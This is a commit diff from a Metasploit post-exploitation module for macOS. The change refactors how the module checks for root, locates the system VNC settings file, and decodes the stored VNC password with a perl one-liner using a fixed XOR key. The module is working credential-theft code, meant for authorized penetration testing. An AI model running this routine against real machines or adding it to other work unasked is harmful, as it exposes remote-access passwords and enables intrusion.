parent
d6a60bd10e
commit
5e7a77dea8
|
@ -7,6 +7,7 @@ require 'msf/core/auxiliary/report'
|
|||
|
||||
class MetasploitModule < Msf::Post
|
||||
include Msf::Post::OSX::Priv
|
||||
include Msf::Post::File
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
|
@ -32,17 +33,18 @@ class MetasploitModule < Msf::Post
|
|||
|
||||
print_status("Running module against #{host}")
|
||||
|
||||
if is_root?
|
||||
print_status("This session is running as root!")
|
||||
print_status("Checking VNC Password...")
|
||||
exist = cmd_exec("if [ -f /Library/Preferences/com.apple.VNCSettings.txt ];then echo 1; else echo 0; fi;")
|
||||
if exist == '1'
|
||||
print_good("Password Found: " + cmd_exec("sudo cat /Library/Preferences/com.apple.VNCSettings.txt | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'"))
|
||||
else
|
||||
print_error("The VNC Password has not been found")
|
||||
end
|
||||
unless is_root?
|
||||
fail_with(Failure::NoAccess, 'It is necessary to be root!')
|
||||
end
|
||||
print_status("This session is running as root!")
|
||||
|
||||
print_status("Checking VNC Password...")
|
||||
vncsettings_path = '/Library/Preferences/com.apple.VNCSettings.txt'
|
||||
if file_exist? vncsettings_path
|
||||
password = cmd_exec("cat #{vncsettings_path} | perl -wne 'BEGIN { @k = unpack \"C*\", pack \"H*\", \"1734516E8BA8C5E2FF1C39567390ADCA\"}; chomp; @p = unpack \"C*\", pack \"H*\", $_; foreach (@k) { printf\"%c\", $_ ^ (shift @p || 0) };'")
|
||||
print_good("Password Found: #{password}")
|
||||
else
|
||||
print_error("It is necessary to be root!")
|
||||
print_error("The VNC Password has not been found")
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue